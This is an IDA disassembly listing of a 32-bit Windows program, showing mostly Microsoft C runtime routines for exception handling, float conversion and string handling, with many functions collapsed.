; [00000088 BYTES: COLLAPSED FUNCTION __stbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __ftbuf. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [000001E6 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000081 BYTES: COLLAPSED FUNCTION __mbsnbcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423257 proc near ; CODE XREF: start:loc_420E00�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_439BE8
call __SEH_prolog
mov [ebp+var_1C], offset dword_43A73C
loc_42326A: ; CODE XREF: sub_423257+3C�j
cmp [ebp+var_1C], offset dword_43A73C
jnb short loc_423295
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_42328B
call eax ; GetUserNameA
jmp short loc_42328B
; ---------------------------------------------------------------------------
loc_423284: ; DATA XREF: .rdata:stru_439BE8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_423288: ; DATA XREF: .rdata:stru_439BE8�o
mov esp, [ebp+ms_exc.old_esp]
loc_42328B: ; CODE XREF: sub_423257+27�j
; sub_423257+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_42326A
; ---------------------------------------------------------------------------
loc_423295: ; CODE XREF: sub_423257+1A�j
call __SEH_epilog
retn
sub_423257 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_42329B()
sub_42329B proc near ; DATA XREF: __cinit:loc_41F181�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_439BF8
call __SEH_prolog
mov [ebp+var_1C], offset dword_43A744
loc_4232AE: ; CODE XREF: sub_42329B+3C�j
cmp [ebp+var_1C], offset dword_43A744
jnb short loc_4232D9
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_4232CF
call eax ; GetUserNameA
jmp short loc_4232CF
; ---------------------------------------------------------------------------
loc_4232C8: ; DATA XREF: .rdata:stru_439BF8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4232CC: ; DATA XREF: .rdata:stru_439BF8�o
mov esp, [ebp+ms_exc.old_esp]
loc_4232CF: ; CODE XREF: sub_42329B+27�j
; sub_42329B+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_4232AE
; ---------------------------------------------------------------------------
loc_4232D9: ; CODE XREF: sub_42329B+1A�j
call __SEH_epilog
retn
sub_42329B endp
; [00000032 BYTES: COLLAPSED FUNCTION __hextodec. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __inc. PRESS KEYPAD "+" TO EXPAND]
; [00000E67 BYTES: COLLAPSED FUNCTION __input. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [0000028C BYTES: COLLAPSED FUNCTION ___libm_error_support. PRESS KEYPAD "+" TO EXPAND]
; [00000035 BYTES: COLLAPSED FUNCTION _has_osfxsr_set. PRESS KEYPAD "+" TO EXPAND]
; [000000CE BYTES: COLLAPSED FUNCTION ___sse2_available_init. PRESS KEYPAD "+" TO EXPAND]
; [000000D3 BYTES: COLLAPSED FUNCTION __floor_default. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
; [0000004B BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __positive. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
; [000000F1 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
; [000000DD BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
; [000000AA BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; [00000040 BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION TypeMatch(_s_HandlerType const *,_s_CatchableType const *,_s_ThrowInfo const *). PRESS KEYPAD "+" TO EXPAND]
; [00000019 BYTES: COLLAPSED FUNCTION FrameUnwindFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; [000000A7 BYTES: COLLAPSED FUNCTION ___FrameUnwindToState. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424D5E proc near ; DATA XREF: .rdata:stru_439D38�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_424D5E endp ; sp-analysis failed
; [00000010 BYTES: COLLAPSED FUNCTION sub_424D64. PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION ___DestructExceptionObject. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424DA8 proc near ; DATA XREF: .rdata:stru_439D50�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_424DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_424DB1 proc near ; DATA XREF: .rdata:stru_439D50�o
mov esp, [ebp-18h]
jmp sub_4254B5
sub_424DB1 endp
; [0000001F BYTES: COLLAPSED FUNCTION AdjustPointer(void *,PMD const &). PRESS KEYPAD "+" TO EXPAND]
; [0000013B BYTES: COLLAPSED FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000003 BYTES: COLLAPSED CHUNK OF FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424F16 proc near ; DATA XREF: .rdata:stru_439D60�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_424F16 endp ; sp-analysis failed
; [00000066 BYTES: COLLAPSED FUNCTION sub_424F1C. PRESS KEYPAD "+" TO EXPAND]
; [00000170 BYTES: COLLAPSED FUNCTION BuildCatchObject(EHExceptionRecord *,void *,_s_HandlerType const *,_s_CatchableType const *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4250F2 proc near ; DATA XREF: .rdata:stru_439D78�o
xor eax, eax
inc eax
retn
sub_4250F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4250F6 proc near ; DATA XREF: .rdata:stru_439D78�o
mov esp, [ebp-18h]
jmp sub_4254B5
sub_4250F6 endp
; [00000067 BYTES: COLLAPSED FUNCTION CatchIt(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,_s_HandlerType const *,_s_CatchableType const *,_s_TryBlockMapEntry const *,int,EHRegistrationNode *,uchar). PRESS KEYPAD "+" TO EXPAND]
; [000000BC BYTES: COLLAPSED FUNCTION FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [000001F2 BYTES: COLLAPSED FUNCTION FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION ___InternalCxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION sub_4254B5. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4254E2 proc near ; CODE XREF: _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *)+23�p
; _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *):loc_42019B�p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset stru_439D98
call __SEH_prolog
mov eax, off_443A70
test eax, eax
jz short loc_42550A
and [ebp+ms_exc.disabled], 0
call eax ; sub_4254B5
jmp short loc_425506
; ---------------------------------------------------------------------------
loc_4254FF: ; DATA XREF: .rdata:stru_439D98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_425503: ; DATA XREF: .rdata:stru_439D98�o
mov esp, [ebp+ms_exc.old_esp]
loc_425506: ; CODE XREF: sub_4254E2+1B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_42550A: ; CODE XREF: sub_4254E2+13�j
jmp sub_4254B5
sub_4254E2 endp
; ---------------------------------------------------------------------------
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION unknown_libname_4. PRESS KEYPAD "+" TO EXPAND]
; [0000004E BYTES: COLLAPSED FUNCTION __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4255AA proc near ; DATA XREF: .data:0043C028�o
push offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
call ds:dword_42B180 ; SetUnhandledExceptionFilter
mov dword_4E2998, eax
xor eax, eax
retn
sub_4255AA endp
; =============== S U B R O U T I N E =======================================
sub_4255BD proc near ; DATA XREF: .data:0043C040�o
push dword_4E2998
call ds:dword_42B180 ; SetUnhandledExceptionFilter
retn
sub_4255BD endp
; [000000D3 BYTES: COLLAPSED FUNCTION __floor_default_0. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [00000159 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [000001F0 BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [000002D0 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION _ungetc. PRESS KEYPAD "+" TO EXPAND]
; [000000C8 BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_427274 proc near ; CODE XREF: ___libm_error_support+11A�p
; ___libm_error_support+1D5�p ...
xor eax, eax
retn
sub_427274 endp
; [000002A5 BYTES: COLLAPSED FUNCTION __raise_exc. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION __handle_exc. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION __set_errno. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __errcode. PRESS KEYPAD "+" TO EXPAND]
; [000000A0 BYTES: COLLAPSED FUNCTION __umatherr. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION __handle_qnan1. PRESS KEYPAD "+" TO EXPAND]
; [000000B8 BYTES: COLLAPSED FUNCTION __except1. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __frnd. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __set_exp. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __sptype. PRESS KEYPAD "+" TO EXPAND]
; [000000BC BYTES: COLLAPSED FUNCTION __decomp. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION __statfp. PRESS KEYPAD "+" TO EXPAND]
; [0000000C BYTES: COLLAPSED FUNCTION __clrfp. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __ctrlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __set_statfp. PRESS KEYPAD "+" TO EXPAND]
; [00000032 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
; [0000004D BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
; [00000019 BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
; [00000158 BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_427E18 proc near ; CODE XREF: sub_427E44+2B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_443CD8
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_427E18 endp
; =============== S U B R O U T I N E =======================================
sub_427E2E proc near ; CODE XREF: sub_427E81+2B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_443CF0
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_427E2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E44 proc near ; CODE XREF: __fassign+12�p
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_4437D4
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_10]
push eax
call sub_427E18
mov ecx, [ebp+var_4]
add esp, 24h
call sub_422B83
leave
retn
sub_427E44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E81 proc near ; CODE XREF: __fassign+2D�p
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_4437D4
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_10]
push eax
call sub_427E2E
mov ecx, [ebp+var_4]
add esp, 24h
call sub_422B83
leave
retn
sub_427E81 endp
; [00000077 BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
; [000000BA BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
; [00000074 BYTES: COLLAPSED FUNCTION __fltout. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 2
call __amsg_exit
pop ecx
retn
; [00000092 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000032 BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4281D4 proc near ; CODE XREF: BuildCatchObject(EHExceptionRecord *,void *,_s_HandlerType const *,_s_CatchableType const *)+53�p
; BuildCatchObject(EHExceptionRecord *,void *,_s_HandlerType const *,_s_CatchableType const *)+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_42B140 ; IsBadReadPtr
test eax, eax
jz short loc_4281EC
xor esi, esi
loc_4281EC: ; CODE XREF: sub_4281D4+14�j
mov eax, esi
pop esi
retn
sub_4281D4 endp
; =============== S U B R O U T I N E =======================================
sub_4281F0 proc near ; CODE XREF: BuildCatchObject(EHExceptionRecord *,void *,_s_HandlerType const *,_s_CatchableType const *)+65�p
; BuildCatchObject(EHExceptionRecord *,void *,_s_HandlerType const *,_s_CatchableType const *)+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_42B1BC ; IsBadWritePtr
test eax, eax
jz short loc_428208
xor esi, esi
loc_428208: ; CODE XREF: sub_4281F0+14�j
mov eax, esi
pop esi
retn
sub_4281F0 endp
; [00000018 BYTES: COLLAPSED FUNCTION _ValidateExecute(int (*)(void)). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000018 BYTES: COLLAPSED CHUNK OF FUNCTION sub_4254B5. PRESS KEYPAD "+" TO EXPAND]
; [0000009F BYTES: COLLAPSED FUNCTION __lseeki64. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000015C BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
; [00000457 BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_428FB8 dd offset loc_428BCD ; DATA XREF: ___strgtold12+65�r
dd offset loc_428C1D ; jump table for switch statement
dd offset loc_428C68
dd offset loc_428C92
dd offset loc_428CEB
dd offset loc_428D60
dd offset loc_428D90
dd offset loc_428DDA
dd offset loc_428DB9
dd offset loc_428E3C
dd offset loc_428E2E
dd offset loc_428DFA
; [0000028E BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION _siglookup. PRESS KEYPAD "+" TO EXPAND]
; [00000129 BYTES: COLLAPSED FUNCTION _raise. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [00000232 BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
; [00000086 BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429712 proc near ; CODE XREF: sub_4297E3+25�p
; sub_42987E+25�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_42A0AC
call __EH_prolog
push ecx
push esi
mov esi, ecx
mov [ebp+var_10], esi
call sub_4299C6
push [ebp+arg_0]
and [ebp+var_4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_43A4BC
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &)
mov ecx, [ebp+var_C]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_429712 endp
; [0000000E BYTES: COLLAPSED FUNCTION unknown_libname_8. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42975C proc near ; CODE XREF: sub_429779+3�p
; sub_4297B1+6�j ...
push esi
mov esi, ecx
push 0 ; Size
push 1 ; char
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_43A4BC
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
mov ecx, esi
pop esi
jmp sub_429A21
sub_42975C endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_429779(void *Memory,char)
sub_429779 proc near ; DATA XREF: .rdata:off_43A4BC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_42975C
test [esp+4+arg_0], 1
jz short loc_42978F
push esi ; Memory
call j__free
pop ecx
loc_42978F: ; CODE XREF: sub_429779+D�j
mov eax, esi
pop esi
retn 4
sub_429779 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_429795(void *Memory,char)
sub_429795 proc near ; DATA XREF: .rdata:off_43A4C8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4297B1
test [esp+4+arg_0], 1
jz short loc_4297AB
push esi ; Memory
call j__free
pop ecx
loc_4297AB: ; CODE XREF: sub_429795+D�j
mov eax, esi
pop esi
retn 4
sub_429795 endp
; =============== S U B R O U T I N E =======================================
sub_4297B1 proc near ; CODE XREF: sub_429795+3�p
; DATA XREF: .rdata:0043A950�o
mov dword ptr [ecx], offset off_43A4C8
jmp sub_42975C
sub_4297B1 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_4297BC(void *Memory,char)
sub_4297BC proc near ; DATA XREF: .rdata:off_43A4D4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4297D8
test [esp+4+arg_0], 1
jz short loc_4297D2
push esi ; Memory
call j__free
pop ecx
loc_4297D2: ; CODE XREF: sub_4297BC+D�j
mov eax, esi
pop esi
retn 4
sub_4297BC endp
; =============== S U B R O U T I N E =======================================
sub_4297D8 proc near ; CODE XREF: sub_4297BC+3�p
; DATA XREF: .rdata:0043A8CC�o
mov dword ptr [ecx], offset off_43A4D4
jmp sub_42975C
sub_4297D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4297E3 proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::erase(uint,uint)+F�p
; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)+13�p ...
var_50 = dword ptr -50h
var_28 = byte ptr -28h
var_4 = dword ptr -4
mov eax, offset loc_42A0BE
call __EH_prolog
sub esp, 44h
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp+var_28]
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
and [ebp+var_4], 0
lea eax, [ebp+var_28]
push eax
lea ecx, [ebp+var_50]
call sub_429712
push offset dword_43A8C8
lea eax, [ebp+var_50]
push eax
mov [ebp+var_50], offset off_43A4D4
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_4297E3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429823 proc near ; CODE XREF: .text:0042986D�p
; sub_42987E+47�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_42A0AC
call __EH_prolog
push ecx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
push edi
mov [ebp+var_10], esi
call ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
and [ebp+var_4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_43A4BC
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &)
mov ecx, [ebp+var_C]
pop edi
mov eax, esi
pop esi
